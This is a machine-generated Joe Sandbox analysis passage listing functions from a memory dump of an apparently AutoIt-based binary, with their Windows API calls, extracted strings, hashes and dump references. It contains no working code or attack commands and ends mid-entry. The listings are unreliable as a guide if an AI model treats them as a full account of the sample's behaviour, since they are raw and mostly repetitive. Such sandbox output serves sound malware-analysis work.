                          • Instruction Fuzzy Hash: 4931A831500204AAEB109F28DC80FFB77EDFF58360F50861AF8AAC7190CA35AC91CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B45B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00B45BE4
                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B45C1F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: InfoItemMenu_memset
                          • String ID: 0
                          • API String ID: 2223754486-4108050209
                          • Opcode ID: 7ab78eeeda9608335e0b5284652c87e2d6df213e266de5aad5a5c6830f78af2b
                          • Instruction ID: 00fdfc3ae0c8a3893f109a18a343c34b73cfd4c83a02b90420dd343eb8b1a443
                          • Opcode Fuzzy Hash: 7ab78eeeda9608335e0b5284652c87e2d6df213e266de5aad5a5c6830f78af2b
                          • Instruction Fuzzy Hash: 3531A531600B19ABDB349F98D9C5BADBBF9EF05350F180099E9C5A61A3D7709B44EF10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B56B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                          Download Yara Rule
                          APIs
                          • __snwprintf.LIBCMT ref: 00B56BDD
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __snwprintf_memmove
                          • String ID: , $$AUTOITCALLVARIABLE%d
                          • API String ID: 3506404897-2584243854
                          • Opcode ID: 10b7330444fd0a39a15652fbd27a66dead5fd14632b29cc47a0aa9e9af377617
                          • Instruction ID: 208c1725aee603c79c4e2c716383998752194eeb652e9df9b32662b4fdd43dba
                          • Opcode Fuzzy Hash: 10b7330444fd0a39a15652fbd27a66dead5fd14632b29cc47a0aa9e9af377617
                          • Instruction Fuzzy Hash: 0E214D31600218ABCF14EFA4C882EEE7BF9EF55B00F5044D5F946A7191DB70EA45CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B691DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B69269
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B69274
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: Combobox
                          • API String ID: 3850602802-2096851135
                          • Opcode ID: 98e5402d067da5ec7bb82301eafd0842bb67a58d9b93b021ffbd3052b34d8a51
                          • Instruction ID: 7620bbf94217168942c84e0c66247a11b987986affb34017057f841529542ee4
                          • Opcode Fuzzy Hash: 98e5402d067da5ec7bb82301eafd0842bb67a58d9b93b021ffbd3052b34d8a51
                          • Instruction Fuzzy Hash: 2B116071200209BFEF219E54DC91EEB37EEEB893A4F104165F9189B290D679DC518BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B1C657
                            • Part of subcall function 00B1C619: GetStockObject.GDI32(00000011), ref: 00B1C66B
                            • Part of subcall function 00B1C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B1C675
                          • GetWindowRect.USER32(00000000,?), ref: 00B69775
                          • GetSysColor.USER32(00000012), ref: 00B6978F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                          • String ID: static
                          • API String ID: 1983116058-2160076837
                          • Opcode ID: a15a8dd2aafe6b08eda46bab9218f3a973a130cc2ccd40d5ce55ddcafb0c2536
                          • Instruction ID: 9e9b5c69c94371aa7a8f816fec1a2dd727e05d3aba8b1c23d360d74c784e91fb
                          • Opcode Fuzzy Hash: a15a8dd2aafe6b08eda46bab9218f3a973a130cc2ccd40d5ce55ddcafb0c2536
                          • Instruction Fuzzy Hash: 6A112672520209AFDB04DFB8CC46EFA7BE8EB08314F004A69F956E3251E779E851DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B69424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetWindowTextLengthW.USER32(00000000), ref: 00B694A6
                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B694B5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: LengthMessageSendTextWindow
                          • String ID: edit
                          • API String ID: 2978978980-2167791130
                          • Opcode ID: 3b5745d8c17a28cab9eb916eb68c9ea0a754a9fa8bc979609104636a2d034af1
                          • Instruction ID: db9143d755224c0c3c6595b44c25798a070f39616d1973102dd865a4bc1e4a60
                          • Opcode Fuzzy Hash: 3b5745d8c17a28cab9eb916eb68c9ea0a754a9fa8bc979609104636a2d034af1
                          • Instruction Fuzzy Hash: 8A113D71100108AFEF209E64DC85EEB3BADEF05374F504765F965972E0CA79DC529B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B45C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00B45CF3
                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00B45D12
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: InfoItemMenu_memset
                          • String ID: 0
                          • API String ID: 2223754486-4108050209
                          • Opcode ID: 9234db479411176dab0dd8ddf3d1c20f6089abc598f1b811dc54419b93c6b5d5
                          • Instruction ID: 50fcd0273c862df2e11c100b1e8582ddcc4ea4d4af038f3b857d2b5a24ca9054
                          • Opcode Fuzzy Hash: 9234db479411176dab0dd8ddf3d1c20f6089abc598f1b811dc54419b93c6b5d5
                          • Instruction Fuzzy Hash: DA117C72D01A18BBDB30DA5CD888F9977E9EF06354F1800A1F945EB192D770AE04E792
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B553F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B5544C
                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B55475
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Internet$OpenOption
                          • String ID: <local>
                          • API String ID: 942729171-4266983199
                          • Opcode ID: 882bd6fcd832d4b5b00d4b9641f309def4bf84525dd1f9634cb31852ef9ea2d7
                          • Instruction ID: 96298931bb3f1d92d98f8e1d9a25ceb1857e9fda77d0ad4ce71fda8dd3d11798
                          • Opcode Fuzzy Hash: 882bd6fcd832d4b5b00d4b9641f309def4bf84525dd1f9634cb31852ef9ea2d7
                          • Instruction Fuzzy Hash: 7C11C170141A21BADB248F5188A5FFABBE8EF12753F1081AAF90542240E3706988C6B0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B5ACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: htonsinet_addr
                          • String ID: 255.255.255.255
                          • API String ID: 3832099526-2422070025
                          • Opcode ID: 0ae5024b8d8f9a0bbfad797ea643b2c05909beece75583591e799c9b294d340c
                          • Instruction ID: b43be6ba6a95fbfb8fd44db9c09bd7b4b4c7f841f92ddf3dd17bd38cf998d482
                          • Opcode Fuzzy Hash: 0ae5024b8d8f9a0bbfad797ea643b2c05909beece75583591e799c9b294d340c
                          • Instruction Fuzzy Hash: F801D675200205ABCB10AF64C886FADB3F4EF04721F2086ABF915AB2D1DA71E804C756
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3C577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B3C5E5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 1456604079-1403004172
                          • Opcode ID: 833463c6f3ed079cea508054fcf105001546dcf722763361fffb1a322b63cf9a
                          • Instruction ID: 2ba5db3037340fc938552e7bdee3dcb817bf64002749c6b5aa4ee3e8fc97e54b
                          • Opcode Fuzzy Hash: 833463c6f3ed079cea508054fcf105001546dcf722763361fffb1a322b63cf9a
                          • Instruction Fuzzy Hash: 6101B171601518ABCB19EBA4CC928FE7BE9EF52310B240A99F433E72D1DF70A9089750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4C4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __fread_nolock_memmove
                          • String ID: EA06
                          • API String ID: 1988441806-3962188686
                          • Opcode ID: 035e59e0147efc994d914e7af7f0986d4862643670e63b87d459c509116e3ad8
                          • Instruction ID: 510e14747da7096d59d68a06576f6114dda9c9e18419d3fec5a6d16466a6dea4
                          • Opcode Fuzzy Hash: 035e59e0147efc994d914e7af7f0986d4862643670e63b87d459c509116e3ad8
                          • Instruction Fuzzy Hash: CE01F572900228AEDB68D7A8C856EFE7BF89F15711F00419AE197D2281E5B4A708CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3C473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00B3C4E1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 1456604079-1403004172
                          • Opcode ID: fc281c202dcc1a51c6285a25e15c5fa19f4dc32c53cc4256506c1f9b1d71828a
                          • Instruction ID: 6f8bd8ab4c20a83f7f697adf88ace546c6f45787be157a45db759a271ccdaab8
                          • Opcode Fuzzy Hash: fc281c202dcc1a51c6285a25e15c5fa19f4dc32c53cc4256506c1f9b1d71828a
                          • Instruction Fuzzy Hash: 10018F716415086BDB15EBA4C9A2AFF7BE89B05300F240595A503F32D1EF549E0897A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3C4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00B3C562
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 1456604079-1403004172
                          • Opcode ID: f9cf92e722553422588007d8a5741e816e02ae1afa8a81a82b766f411c4365a1
                          • Instruction ID: 1baf3fa520bb4013bc1d68ef947ce551ea8ca7337ad501e60e533614e640f976
                          • Opcode Fuzzy Hash: f9cf92e722553422588007d8a5741e816e02ae1afa8a81a82b766f411c4365a1
                          • Instruction Fuzzy Hash: D801AD71A415086BDB15EBA4C953EFF7BEC9B11701F240195B403F31D1EB54AE0997B1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ClassName_wcscmp
                          • String ID: #32770
                          • API String ID: 2292705959-463685578
                          • Opcode ID: 696574c1a29a37f96a87911445300cf8791d4b8b5034fc1801d7a7fffd6ac041
                          • Instruction ID: 962d4fd52fe2087e4835e7575535894baec9829234b08c2a76c7d25542f76890
                          • Opcode Fuzzy Hash: 696574c1a29a37f96a87911445300cf8791d4b8b5034fc1801d7a7fffd6ac041
                          • Instruction Fuzzy Hash: 94E0D83360422967D720EBA5EC4AEDBFBECEB51B64F000066F914D3191EAB0974587D0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3B35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                          Download Yara Rule
                          APIs
                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B3B36B
                            • Part of subcall function 00B22011: _doexit.LIBCMT ref: 00B2201B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Message_doexit
                          • String ID: AutoIt$Error allocating memory.
                          • API String ID: 1993061046-4017498283
                          • Opcode ID: 09035f713dcc1fa15457e082d9a97bd44b01826e8f576149c6f7dec9b0096c7d
                          • Instruction ID: 5972162c6846a9aee6264c0826661a99f782fa4091a74d026ca033ac0c6deaea
                          • Opcode Fuzzy Hash: 09035f713dcc1fa15457e082d9a97bd44b01826e8f576149c6f7dec9b0096c7d
                          • Instruction Fuzzy Hash: 9DD0123138432833D21532957C0BFD97BC88F05B51F1000A6BF4CA61E28AD6A49092E9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4D009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          • GetTempPathW.KERNEL32(00000104,?), ref: 00B4D01E
                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00B4D035
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Temp$FileNamePath
                          • String ID: aut
                          • API String ID: 3285503233-3010740371
                          • Opcode ID: 99a976f81e62828ec6a8ac0dd9df9013a73239564447bca9ebf0f9518fa27123
                          • Instruction ID: c3c320fe38c1c48a42d2cf1532c0a13a6bfa2c3c04a49e0db44ef17c422f40e3
                          • Opcode Fuzzy Hash: 99a976f81e62828ec6a8ac0dd9df9013a73239564447bca9ebf0f9518fa27123
                          • Instruction Fuzzy Hash: 8BD05EB154030EBBDB10AFA0ED0EFA9B7ACA700704F1041917615D20F1D7F0E645CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B68495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                          Download Yara Rule
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B6849F
                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B684B2
                            • Part of subcall function 00B48355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00B483CD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
